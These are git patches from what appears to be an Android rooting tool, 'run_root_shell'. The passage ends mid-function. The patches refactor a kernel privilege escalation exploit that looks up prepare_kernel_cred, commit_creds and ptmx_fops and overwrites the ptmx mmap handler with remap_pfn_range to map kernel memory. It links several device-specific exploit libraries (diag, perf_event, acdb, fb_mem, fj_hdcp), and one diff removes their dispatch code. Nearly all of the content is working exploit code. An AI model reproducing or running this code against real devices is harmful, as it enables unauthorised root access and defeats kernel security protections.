__system_property_get("ro.build.display.id", build_id); + print_reason_device_not_supported(); - printf("\n\nDevice detected: %s (%s)\n\n", device, build_id); + return false; } int @@ -141,15 +171,8 @@ main(int argc, char **argv) device_detected(); - set_kernel_phys_offset(0x200000); - remap_pfn_range = get_remap_pfn_range_address(); - if (!remap_pfn_range) { - printf("You need to manage to get remap_pfn_range addresses.\n"); - exit(EXIT_FAILURE); - } - - if (!setup_creds_functions()) { - printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n"); + if (!setup_variables()) { + printf("Failed to setup variables.\n"); exit(EXIT_FAILURE); } diff --git a/mm.c b/mm.c index b7db0e2..f3f1ab4 100644 --- a/mm.c +++ b/mm.c @@ -1,31 +1,36 @@ +#include +#include +#include +#include + +#include "exploit.h" #include "kallsyms.h" #include "mm.h" +#include "ptmx.h" +#include "libdiagexploit/diag.h" #include "device_database/device_database.h" -unsigned long int -_get_remap_pfn_range_address(void) -{ - unsigned long int address = device_get_symbol_address(DEVICE_SYMBOL(remap_pfn_range)); - - if (address) { - return address; - } - print_reason_device_not_supported(); +static unsigned long int kernel_phys_offset; - return 0; -} +int (*remap_pfn_range)(struct vm_area_struct *, unsigned long addr, + unsigned long pfn, unsigned long size, pgprot_t); -void * +bool get_remap_pfn_range_address(void) { - if (kallsyms_exist()) { - return kallsyms_get_symbol_address("remap_pfn_range"); + if (remap_pfn_range) { + return true; } - return (void*)_get_remap_pfn_range_address(); -} -static unsigned long int kernel_phys_offset = 0; + remap_pfn_range = (void *)device_get_symbol_address(DEVICE_SYMBOL(remap_pfn_range)); + + if (!remap_pfn_range && kallsyms_exist()) { + remap_pfn_range = kallsyms_get_symbol_address("remap_pfn_range"); + } + + return !!remap_pfn_range; +} void set_kernel_phys_offset(unsigned long int offset) @@ -35,6 +40,51 @@ set_kernel_phys_offset(unsigned long int offset) #define PAGE_SHIFT 12 +void * +convert_to_kernel_address(void *address, void *mmap_base_address) +{ + return address - mmap_base_address + (void*)PAGE_OFFSET; +} + +void * +convert_to_mmaped_address(void *address, void *mmap_base_address) +{ + return mmap_base_address + (address - (void*)PAGE_OFFSET); +} + +static bool +detect_kernel_phys_parameters(void) +{ + FILE *fp; + void *system_ram_address; + char name[BUFSIZ]; + void *start_address, *end_address; + int ret; + + system_ram_address = NULL; + + fp = fopen("/proc/iomem", "r"); + if (!fp) { + printf("Failed to open /proc/iomem due to %s.\n", strerror(errno)); + return false; + } + + while ((ret = fscanf(fp, "%p-%p : %[^\n]", &start_address, &end_address, name)) != EOF) { + if (!strcmp(name, "System RAM")) { + system_ram_address = start_address; + continue; + } + if (!strncmp(name, "Kernel", 6)) { + break; + } + } + fclose(fp); + + set_kernel_phys_offset((int)system_ram_address); + + return true; +} + int ptmx_mmap(struct file *filep, struct vm_area_struct *vma) { @@ -43,3 +93,97 @@ ptmx_mmap(struct file *filep, struct vm_area_struct *vma) vma->vm_end - vma->vm_start, vma->vm_page_prot); } +static bool +run_callback_with_mmap(void *user_data) +{ + int fd; + void *address; + void *start_address = (void *)0x20000000; + mmap_callback_t callback = (mmap_callback_t)user_data; + bool ret; + + fd = open(PTMX_DEVICE, O_RDWR); + address = mmap(start_address, KERNEL_SIZE, + PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED, + fd, 0); + if (address == MAP_FAILED) { + printf("Failed to mmap /dev/ptmx due to %s.\n", strerror(errno)); + close(fd); + return false; + } + + ret = callback(address, KERNEL_SIZE); + + munmap(address, KERNEL_SIZE); + + close(fd); + + return ret; +} + +typedef struct _callback_mmap_exploit_info_t { + mmap_callback_t func; + bool result; +} callback_mmap_exploit_info_t; + +static bool +run_callback_mmap_exploit(void *address, size_t length, void *param) +{ + callback_mmap_exploit_info_t *info = param; + + info->result = info->func(address, length); + + return true; +} + +static bool +run_exploit_mmap(mmap_callback_t callback, bool *result) +{ + callback_mmap_exploit_info_t info; + + info.func = callback; + + if (attempt_mmap_exploit(&run_callback_mmap_exploit, &info)) { + *result = info.result; + return true; + } + + return false; +} + +bool +run_with_mmap(mmap_callback_t callback) +{ + unsigned long int kernel_physical_offset; + bool result; + + if (run_exploit_mmap(callback, &result)) { + return result; + } + + get_remap_pfn_range_address(); + + if (!remap_pfn_range) { + printf("You need to manage to get remap_pfn_range addresses.\n"); + return false; + } + + get_ptmx_fops_mmap_address(); + if (!ptmx_fops_mmap_address) { + printf("You need to manage to get ptmx_fops addresses.\n"); + return false; + } + + kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); + if (kernel_physical_offset) { + set_kernel_phys_offset(kernel_physical_offset - 0x00008000); + } + else if (!detect_kernel_phys_parameters()) { + printf("You need to manage to get kernel_physical_offset addresses.\n"); + return false; + } + + return attempt_exploit(ptmx_fops_mmap_address, + (unsigned long int)&ptmx_mmap, 0, + run_callback_with_mmap, callback); +} diff --git a/mm.h b/mm.h index 38aecbf..e052be6 100644 --- a/mm.h +++ b/mm.h @@ -18,6 +18,12 @@ #ifndef MM_H #define MM_H +#include +#include + +#define PAGE_OFFSET 0xc0000000 +#define KERNEL_SIZE 0x10000000 + struct file; typedef struct { @@ -32,13 +38,17 @@ struct vm_area_struct { /* ... */ }; -int (*remap_pfn_range)(struct vm_area_struct *, unsigned long addr, - unsigned long pfn, unsigned long size, pgprot_t); +typedef bool (*mmap_callback_t)(void *mem, size_t length); + +extern bool get_remap_pfn_range_address(void); +extern bool run_with_mmap(mmap_callback_t callback); -void *get_remap_pfn_range_address(void); +extern void set_kernel_phys_offset(unsigned long int offset); +extern void *convert_to_kernel_address(void *address, void *mmap_base_address); +extern void *convert_to_mmaped_address(void *address, void *mmap_base_address); -void set_kernel_phys_offset(unsigned long int offset); -int ptmx_mmap(struct file *filep, struct vm_area_struct *vma); +extern int (*remap_pfn_range)(struct vm_area_struct *, unsigned long addr, + unsigned long pfn, unsigned long size, pgprot_t); #endif /* MM_H */ /* diff --git a/ptmx.c b/ptmx.c index ca79c4f..5022a2e 100644 --- a/ptmx.c +++ b/ptmx.c @@ -1,23 +1,73 @@ +#include +#include #include "ptmx.h" +#include "kallsyms.h" #include "device_database/device_database.h" -unsigned long int +void *ptmx_fops; +unsigned long int ptmx_fops_mmap_address; +unsigned long int ptmx_fops_fsync_address; + +bool get_ptmx_fops_address(void) { - unsigned long int address; + if (ptmx_fops) { + return true; + } + + ptmx_fops = (void *)device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops)); - address = device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops)); - if (address) { - return address; + if (!ptmx_fops && kallsyms_exist()) { + ptmx_fops = kallsyms_get_symbol_address("ptmx_fops"); } - if (kallsyms_exist()) { - address = kallsyms_get_symbol_address("ptmx_fops"); - if (address) { - return address; + return !!ptmx_fops; +} + +bool +get_ptmx_fops_mmap_address(void) +{ + if (!ptmx_fops) { + get_ptmx_fops_address(); + if (!ptmx_fops) { + return false; } } - print_reason_device_not_supported(); - return 0; + ptmx_fops_mmap_address = (unsigned long int)ptmx_fops + 0x28; + return true; +} + +bool +get_ptmx_fops_fsync_address(void) +{ + if (!ptmx_fops) { + get_ptmx_fops_address(); + if (!ptmx_fops) { + return false; + } + } + + ptmx_fops_fsync_address = (unsigned long int)ptmx_fops + 0x38; + return true; +} + +bool +get_ptmx_fops_address_in_memory(void *mem, size_t length, find_ptmx_fops_hint_t *hint) +{ + unsigned long int pattern[16]; + void *address; + + memset(pattern, 0, sizeof pattern); + pattern[2] = hint->ptmx_open_address; + pattern[4] = hint->tty_release_address; + pattern[7] = hint->tty_fasync_address; + + address = memmem(mem, length, pattern, sizeof pattern); + if (!address) { + return false; + } + + ptmx_fops = (void *)convert_to_kernel_address(address, mem) - 0x24; + return true; } diff --git a/ptmx.h b/ptmx.h index 84987c4..9495ff2 100644 --- a/ptmx.h +++ b/ptmx.h @@ -18,9 +18,27 @@ #ifndef PTMX_H #define PTMX_H +#include +#include + #define PTMX_DEVICE "/dev/ptmx" -unsigned long int get_ptmx_fops_address(void); +typedef struct _find_ptmx_fops_hint_t { + unsigned long int ptmx_open_address; + unsigned long int tty_release_address; + unsigned long int tty_fasync_address; +} find_ptmx_fops_hint_t; + +extern bool get_ptmx_fops_address(void); +extern bool get_ptmx_fops_mmap_address(void); +extern bool get_ptmx_fops_fsync_address(void); + +extern bool get_ptmx_fops_address_in_memory(void *mem, size_t length, + find_ptmx_fops_hint_t *hint); + +extern void *ptmx_fops; +extern unsigned long int ptmx_fops_mmap_address; +extern unsigned long int ptmx_fops_fsync_address; #endif /* PTMX_H */ /* From de1f5f66d71091e2303ce04e15f5cebd3d011130 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Thu, 25 Jul 2013 20:55:46 +0900 Subject: [PATCH 067/125] Fix indentation --- exploit.h | 2 +- main.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/exploit.h b/exploit.h index f87ed99..00cb5cb 100644 --- a/exploit.h +++ b/exploit.h @@ -27,7 +27,7 @@ extern bool attempt_exploit(unsigned long int address, unsigned long int write_value, unsigned long int restore_value, exploit_callback_t callback_func, - void *callback_param); + void *callback_param); extern bool attempt_mmap_exploit(exploit_mmap_callback_t callback_func, void *callback_param); diff --git a/main.c b/main.c index 6d3bec7..69efba6 100644 --- a/main.c +++ b/main.c @@ -102,7 +102,7 @@ bool find_variables_in_memory(void *mem, size_t length) ptmx_fops = (void *)kallsyms_in_memory_lookup_name("ptmx_fops"); if (!ptmx_fops) { - find_ptmx_fops_address(mem, length); + find_ptmx_fops_address(mem, length); } } From 23c69465307a9e844a2c0133a14a6a345c6127e7 Mon Sep 17 00:00:00 2001 From: fi01 Date: Fri, 26 Jul 2013 08:43:37 +0900 Subject: [PATCH 068/125] Rename function get_xx_address() to setup_xx_address() --- cred.c | 8 ++++---- cred.h | 8 ++++---- exploit.c | 17 +++++++++++++++++ exploit.h | 2 +- main.c | 14 +++++++------- mm.c | 6 +++--- mm.h | 2 +- ptmx.c | 12 ++++++------ ptmx.h | 10 +++++----- 9 files changed, 48 insertions(+), 31 deletions(-) diff --git a/cred.c b/cred.c index 5c35823..2e45e13 100644 --- a/cred.c +++ b/cred.c @@ -10,7 +10,7 @@ prepare_kernel_cred_t prepare_kernel_cred; commit_creds_t commit_creds; bool -get_prepare_kernel_cred_address(void) +setup_prepare_kernel_cred_address(void) { if (prepare_kernel_cred) { return true; @@ -26,7 +26,7 @@ get_prepare_kernel_cred_address(void) } bool -get_commit_creds_address(void) +setup_commit_creds_address(void) { if (commit_creds) { return true; @@ -84,7 +84,7 @@ find_commit_creds_address_in_memory(void *mem, size_t length) } bool -get_prepare_kernel_cred_address_in_memory(void *mem, size_t length) +setup_prepare_kernel_cred_address_in_memory(void *mem, size_t length) { if (prepare_kernel_cred) { return true; @@ -94,7 +94,7 @@ get_prepare_kernel_cred_address_in_memory(void *mem, size_t length) } bool -get_commit_creds_address_in_memory(void *mem, size_t length) +setup_commit_creds_address_in_memory(void *mem, size_t length) { if (commit_creds) { return true; diff --git a/cred.h b/cred.h index 01d928f..7014e31 100644 --- a/cred.h +++ b/cred.h @@ -27,11 +27,11 @@ struct task_struct; typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *); typedef int (*commit_creds_t)(struct cred *); -extern bool get_prepare_kernel_cred_address(); -extern bool get_commit_creds_address(); +extern bool setup_prepare_kernel_cred_address(); +extern bool setup_commit_creds_address(); -extern bool get_prepare_kernel_cred_address_in_memory(void *mem, size_t length); -extern bool get_commit_creds_address_in_memory(void *mem, size_t length); +extern bool setup_prepare_kernel_cred_address_in_memory(void *mem, size_t length); +extern bool setup_commit_creds_address_in_memory(void *mem, size_t length); extern prepare_kernel_cred_t prepare_kernel_cred; extern commit_creds_t commit_creds; diff --git a/exploit.c b/exploit.c index a1f134a..1bcd9f5 100644 --- a/exploit.c +++ b/exploit.c @@ -1,3 +1,20 @@ +/* + * Copyright (C) 2013 fi01 + * + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + * + */ #include #include #include diff --git a/exploit.h b/exploit.h index 00cb5cb..e6aa746 100644 --- a/exploit.h +++ b/exploit.h @@ -1,5 +1,5 @@ /* - * Copyright (C) 2013 Hiroyuki Ikezoe + * Copyright (C) 2013 fi01 * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by diff --git a/main.c b/main.c index 69efba6..719923d 100644 --- a/main.c +++ b/main.c @@ -38,7 +38,7 @@ run_obtain_root_privilege(void *user_data) static bool run_exploit(void) { - get_ptmx_fops_fsync_address(); + setup_ptmx_fops_fsync_address(); if (!ptmx_fops_fsync_address) { return false; } @@ -80,7 +80,7 @@ find_ptmx_fops_address(void *mem, size_t length) return false; } - return get_ptmx_fops_address_in_memory(mem, length, &hint); + return setup_ptmx_fops_address_in_memory(mem, length, &hint); } bool find_variables_in_memory(void *mem, size_t length) @@ -111,8 +111,8 @@ bool find_variables_in_memory(void *mem, size_t length) } } - get_prepare_kernel_cred_address_in_memory(mem, length); - get_commit_creds_address_in_memory(mem, length); + setup_prepare_kernel_cred_address_in_memory(mem, length); + setup_commit_creds_address_in_memory(mem, length); return prepare_kernel_cred && commit_creds && ptmx_fops; } @@ -120,9 +120,9 @@ bool find_variables_in_memory(void *mem, size_t length) bool setup_variables(void) { - get_prepare_kernel_cred_address(); - get_commit_creds_address(); - get_ptmx_fops_address(); + setup_prepare_kernel_cred_address(); + setup_commit_creds_address(); + setup_ptmx_fops_address(); if (prepare_kernel_cred && commit_creds && ptmx_fops) { return true; diff --git a/mm.c b/mm.c index f3f1ab4..e1e2b1d 100644 --- a/mm.c +++ b/mm.c @@ -17,7 +17,7 @@ int (*remap_pfn_range)(struct vm_area_struct *, unsigned long addr, unsigned long pfn, unsigned long size, pgprot_t); bool -get_remap_pfn_range_address(void) +setup_remap_pfn_range_address(void) { if (remap_pfn_range) { return true; @@ -161,14 +161,14 @@ run_with_mmap(mmap_callback_t callback) return result; } - get_remap_pfn_range_address(); + setup_remap_pfn_range_address(); if (!remap_pfn_range) { printf("You need to manage to get remap_pfn_range addresses.\n"); return false; } - get_ptmx_fops_mmap_address(); + setup_ptmx_fops_mmap_address(); if (!ptmx_fops_mmap_address) { printf("You need to manage to get ptmx_fops addresses.\n"); return false; diff --git a/mm.h b/mm.h index e052be6..edbb1a7 100644 --- a/mm.h +++ b/mm.h @@ -40,7 +40,7 @@ struct vm_area_struct { typedef bool (*mmap_callback_t)(void *mem, size_t length); -extern bool get_remap_pfn_range_address(void); +extern bool setup_remap_pfn_range_address(void); extern bool run_with_mmap(mmap_callback_t callback); extern void set_kernel_phys_offset(unsigned long int offset); diff --git a/ptmx.c b/ptmx.c index 5022a2e..fccafd9 100644 --- a/ptmx.c +++ b/ptmx.c @@ -9,7 +9,7 @@ unsigned long int ptmx_fops_mmap_address; unsigned long int ptmx_fops_fsync_address; bool -get_ptmx_fops_address(void) +setup_ptmx_fops_address(void) { if (ptmx_fops) { return true; @@ -25,10 +25,10 @@ get_ptmx_fops_address(void) } bool -get_ptmx_fops_mmap_address(void) +setup_ptmx_fops_mmap_address(void) { if (!ptmx_fops) { - get_ptmx_fops_address(); + setup_ptmx_fops_address(); if (!ptmx_fops) { return false; } @@ -39,10 +39,10 @@ get_ptmx_fops_mmap_address(void) } bool -get_ptmx_fops_fsync_address(void) +setup_ptmx_fops_fsync_address(void) { if (!ptmx_fops) { - get_ptmx_fops_address(); + setup_ptmx_fops_address(); if (!ptmx_fops) { return false; } @@ -53,7 +53,7 @@ get_ptmx_fops_fsync_address(void) } bool -get_ptmx_fops_address_in_memory(void *mem, size_t length, find_ptmx_fops_hint_t *hint) +setup_ptmx_fops_address_in_memory(void *mem, size_t length, find_ptmx_fops_hint_t *hint) { unsigned long int pattern[16]; void *address; diff --git a/ptmx.h b/ptmx.h index 9495ff2..2240445 100644 --- a/ptmx.h +++ b/ptmx.h @@ -29,12 +29,12 @@ typedef struct _find_ptmx_fops_hint_t { unsigned long int tty_fasync_address; } find_ptmx_fops_hint_t; -extern bool get_ptmx_fops_address(void); -extern bool get_ptmx_fops_mmap_address(void); -extern bool get_ptmx_fops_fsync_address(void); +extern bool setup_ptmx_fops_address(void); +extern bool setup_ptmx_fops_mmap_address(void); +extern bool setup_ptmx_fops_fsync_address(void); -extern bool get_ptmx_fops_address_in_memory(void *mem, size_t length, - find_ptmx_fops_hint_t *hint); +extern bool setup_ptmx_fops_address_in_memory(void *mem, size_t length, + find_ptmx_fops_hint_t *hint); extern void *ptmx_fops; extern unsigned long int ptmx_fops_mmap_address; From 74758cdad55e509929177a6bfea6172f4b054826 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 1 Aug 2013 14:24:54 +0900 Subject: [PATCH 069/125] Update for new kallsyms_in_memory_lookup_names API --- device_database | 2 +- libfb_mem_exploit | 2 +- libkallsyms | 2 +- libmsm_acdb_exploit | 2 +- libperf_event_exploit | 2 +- main.c | 24 +++++++++++++++--------- 6 files changed, 20 insertions(+), 14 deletions(-) diff --git a/device_database b/device_database index 6b6fdc8..3603408 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 6b6fdc850489ae9380a272e663bb4c9d1c661f6a +Subproject commit 3603408c4a37fe6856518cb3e3e0b0dfb5f3a761 diff --git a/libfb_mem_exploit b/libfb_mem_exploit index 02ca1c9..59377cc 160000 --- a/libfb_mem_exploit +++ b/libfb_mem_exploit @@ -1 +1 @@ -Subproject commit 02ca1c9ce0277b169373dde32f46386a3173f1b2 +Subproject commit 59377cc8b26f26ae8688080cda05158b5d3fb52b diff --git a/libkallsyms b/libkallsyms index 4c910a5..cfdca89 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit 4c910a5580841d9fb2738804ae1b24dbd02834d2 +Subproject commit cfdca89d48c5447586e2cae489fc8b7091bfec15 diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 700defd..74d0503 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 700defd15d650a2195b3b2310cc1fa0e09d56e0f +Subproject commit 74d05030e526e0767c1b4fd1ef5374a70ac8046c diff --git a/libperf_event_exploit b/libperf_event_exploit index fe2f4f5..abaf4e5 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit fe2f4f501acf7f5a35e9415b7b4e944b914d69fd +Subproject commit abaf4e55aef0b384690e67f4edae2e089d0e8d0a diff --git a/main.c b/main.c index 719923d..5701afe 100644 --- a/main.c +++ b/main.c @@ -15,6 +15,7 @@ #include "mm.h" #include "ptmx.h" #include "exploit.h" +#include "libkallsyms/kallsyms_in_memory.h" void obtain_root_privilege(void) @@ -61,21 +62,21 @@ device_detected(void) } static bool -find_ptmx_fops_address(void *mem, size_t length) +find_ptmx_fops_address(kallsyms *info, void *mem, size_t length) { find_ptmx_fops_hint_t hint; - hint.ptmx_open_address = kallsyms_in_memory_lookup_name("ptmx_open"); + hint.ptmx_open_address = kallsyms_in_memory_lookup_name(info, "ptmx_open"); if (!hint.ptmx_open_address) { return false; } - hint.tty_release_address = kallsyms_in_memory_lookup_name("tty_release"); + hint.tty_release_address = kallsyms_in_memory_lookup_name(info, "tty_release"); if (!hint.tty_release_address) { return false; } - hint.tty_fasync_address = kallsyms_in_memory_lookup_name("tty_fasync"); + hint.tty_fasync_address = kallsyms_in_memory_lookup_name(info, "tty_fasync"); if (!hint.tty_fasync_address) { return false; } @@ -85,27 +86,32 @@ find_ptmx_fops_address(void *mem, size_t length) bool find_variables_in_memory(void *mem, size_t length) { + kallsyms *info; + printf("Search address in memroy...\n"); - if (kallsyms_in_memory_init(mem, length)) { + info = kallsyms_in_memory_init(mem, length); + if (info) { printf("Using kallsyms_in_memroy...\n"); if (!prepare_kernel_cred) { - prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name("prepare_kernel_cred"); + prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); } if (!commit_creds) { - commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name("commit_creds"); + commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); } if (!ptmx_fops) { - ptmx_fops = (void *)kallsyms_in_memory_lookup_name("ptmx_fops"); + ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); if (!ptmx_fops) { - find_ptmx_fops_address(mem, length); + find_ptmx_fops_address(info, mem, length); } } + kallsyms_in_memory_free(info); + if (prepare_kernel_cred && commit_creds && ptmx_fops) { return true; } From 3d56f65236ef929ddacd0ede0403299ba3cb61cd Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sun, 4 Aug 2013 22:11:34 +0530 Subject: [PATCH 070/125] updated subprojects --- device_database | 2 +- libdiagexploit | 2 +- libfb_mem_exploit | 2 +- libkallsyms | 2 +- libperf_event_exploit | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/device_database b/device_database index 3603408..548896c 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 3603408c4a37fe6856518cb3e3e0b0dfb5f3a761 +Subproject commit 548896c31944d854c57c34d02dbaeeb92fe1a65d diff --git a/libdiagexploit b/libdiagexploit index 4dd7f1b..83a2e0c 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 4dd7f1b0dadb3ae5d8a914e1e22979c7bed3b6c3 +Subproject commit 83a2e0c09765ac7b0f2c2e138590877f37188e1e diff --git a/libfb_mem_exploit b/libfb_mem_exploit index 59377cc..de67230 160000 --- a/libfb_mem_exploit +++ b/libfb_mem_exploit @@ -1 +1 @@ -Subproject commit 59377cc8b26f26ae8688080cda05158b5d3fb52b +Subproject commit de67230ff25909fb38417490fee745925898009a diff --git a/libkallsyms b/libkallsyms index cfdca89..cb04750 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit cfdca89d48c5447586e2cae489fc8b7091bfec15 +Subproject commit cb047501155601e7699e4653ba2067d6cf1087b4 diff --git a/libperf_event_exploit b/libperf_event_exploit index abaf4e5..48287d1 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit abaf4e55aef0b384690e67f4edae2e089d0e8d0a +Subproject commit 48287d1ad1bf9c7fb9422931bab6e136ea574817 From c88e432fc6b4729be31eeb866f7b454ec67561dc Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sun, 4 Aug 2013 22:17:42 +0530 Subject: [PATCH 071/125] updated subprojects --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 548896c..eef5d06 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 548896c31944d854c57c34d02dbaeeb92fe1a65d +Subproject commit eef5d06967a3df185baebc7dadae43b423f0e71e diff --git a/libperf_event_exploit b/libperf_event_exploit index 48287d1..92594d4 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 48287d1ad1bf9c7fb9422931bab6e136ea574817 +Subproject commit 92594d4177c238e1231489c1f1be23529e23f2bf From 962135db06ac0e682142913b50e542cb7608dd56 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 8 Aug 2013 14:36:30 +0900 Subject: [PATCH 072/125] subproject with latest commits --- device_database | 2 +- libdiagexploit | 2 +- libperf_event_exploit | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index eef5d06..22c7db1 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit eef5d06967a3df185baebc7dadae43b423f0e71e +Subproject commit 22c7db1fe12f1d43ba94908f18302eeb87d5aa87 diff --git a/libdiagexploit b/libdiagexploit index 83a2e0c..4dd7f1b 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 83a2e0c09765ac7b0f2c2e138590877f37188e1e +Subproject commit 4dd7f1b0dadb3ae5d8a914e1e22979c7bed3b6c3 diff --git a/libperf_event_exploit b/libperf_event_exploit index 92594d4..e66611f 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 92594d4177c238e1231489c1f1be23529e23f2bf +Subproject commit e66611f7fe1fe5acd308127d581d4fa81ee661fe From ddf7e79878f3eada8276e96527b1c268dea44551 Mon Sep 17 00:00:00 2001 From: fi01 Date: Fri, 23 Aug 2013 09:13:24 +0900 Subject: [PATCH 073/125] subproject with latest commits --- device_database | 2 +- libmsm_acdb_exploit | 2 +- libperf_event_exploit | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index 22c7db1..27e25ff 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 22c7db1fe12f1d43ba94908f18302eeb87d5aa87 +Subproject commit 27e25ff074200baca24170482888df14d6e9292b diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 74d0503..6ec9088 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 74d05030e526e0767c1b4fd1ef5374a70ac8046c +Subproject commit 6ec9088d0bdef05cf1ab7ad8c9546914631cb92f diff --git a/libperf_event_exploit b/libperf_event_exploit index e66611f..57b6ff9 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit e66611f7fe1fe5acd308127d581d4fa81ee661fe +Subproject commit 57b6ff9021840fb360469c70d205e4246a420c48 From d69e8a386276bb53b0fd5daa2d5a973bffd54443 Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 28 Aug 2013 12:23:12 +0900 Subject: [PATCH 074/125] Use libexploit submodule --- .gitmodules | 3 + Android.mk | 8 +-- exploit.c | 191 ---------------------------------------------------- exploit.h | 38 ----------- libexploit | 1 + main.c | 2 +- mm.c | 6 +- mm.h | 4 +- 8 files changed, 14 insertions(+), 239 deletions(-) delete mode 100644 exploit.c delete mode 100644 exploit.h create mode 160000 libexploit diff --git a/.gitmodules b/.gitmodules index b968e90..fea3c72 100644 --- a/.gitmodules +++ b/.gitmodules @@ -19,3 +19,6 @@ [submodule "libfb_mem_exploit"] path = libfb_mem_exploit url = https://github.com/android-rooting-tools/libfb_mem_exploit.git +[submodule "libexploit"] + path = libexploit + url = https://github.com/android-rooting-tools/libexploit.git diff --git a/Android.mk b/Android.mk index 7961685..34396cd 100644 --- a/Android.mk +++ b/Android.mk @@ -7,13 +7,13 @@ LOCAL_SRC_FILES := \ kallsyms.c \ main.c \ mm.c \ - ptmx.c \ - exploit.c + ptmx.c LOCAL_MODULE := run_root_shell LOCAL_MODULE_TAGS := optional -LOCAL_STATIC_LIBRARIES := libdiagexploit -LOCAL_STATIC_LIBRARIES += libdevice_database +LOCAL_STATIC_LIBRARIES := libdevice_database +LOCAL_STATIC_LIBRARIES += libexploit +LOCAL_STATIC_LIBRARIES += libdiagexploit LOCAL_STATIC_LIBRARIES += libperf_event_exploit LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit diff --git a/exploit.c b/exploit.c deleted file mode 100644 index 1bcd9f5..0000000 --- a/exploit.c +++ /dev/null @@ -1,191 +0,0 @@ -/* - * Copyright (C) 2013 fi01 - * - * This program is free software: you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, either version 3 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program. If not, see . - * - */ -#include -#include -#include -#include - -#include "exploit.h" -#include "mm.h" -#include "device_database.h" -#include "libdiagexploit/diag.h" -#include "libperf_event_exploit/perf_event.h" -#include "libmsm_acdb_exploit/acdb.h" -#include "libfj_hdcp_exploit/fj_hdcp.h" -#include "libfb_mem_exploit/fb_mem.h" - -typedef struct _callback_info_t { - exploit_callback_t func; - void *param; - bool result; -} callback_info_t; - -static bool -run_callback(void *param) -{ - callback_info_t *info = param; - - info->result = info->func(info->param); - - return true; -} - -static bool -attempt_diag_exploit(unsigned long int address, - unsigned long int write_value, - callback_info_t *info) -{ - struct diag_values injection_data; - - if (write_value > (uint16_t)-1) { - return false; - } - - injection_data.address = address; - injection_data.value = (uint16_t)write_value; - - return diag_run_exploit(&injection_data, 1, &run_callback, info); -} - -static bool -attempt_acdb_exploit(unsigned long int address, - unsigned long int write_value, - unsigned long int restore_value, - callback_info_t *info) -{ - if (acdb_run_exploit(address, write_value, &run_callback, info)) { - acdb_write_value_at_address(address, restore_value); - - return true; - } - - return false; -} - -static bool -attempt_fj_hdcp_exploit(unsigned long int address, - unsigned long int write_value, - unsigned long int restore_value, - callback_info_t *info) -{ - if (fj_hdcp_run_exploit(address, write_value, &run_callback, info)) { - fj_hdcp_write_value_at_address(address, restore_value); - - return true; - } - - return false; -} - -static bool -attempt_fb_mem_exploit(unsigned long int address, - unsigned long int write_value, - unsigned long int restore_value, - callback_info_t *info) -{ - unsigned long int kernel_physical_offset; - - kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); - if 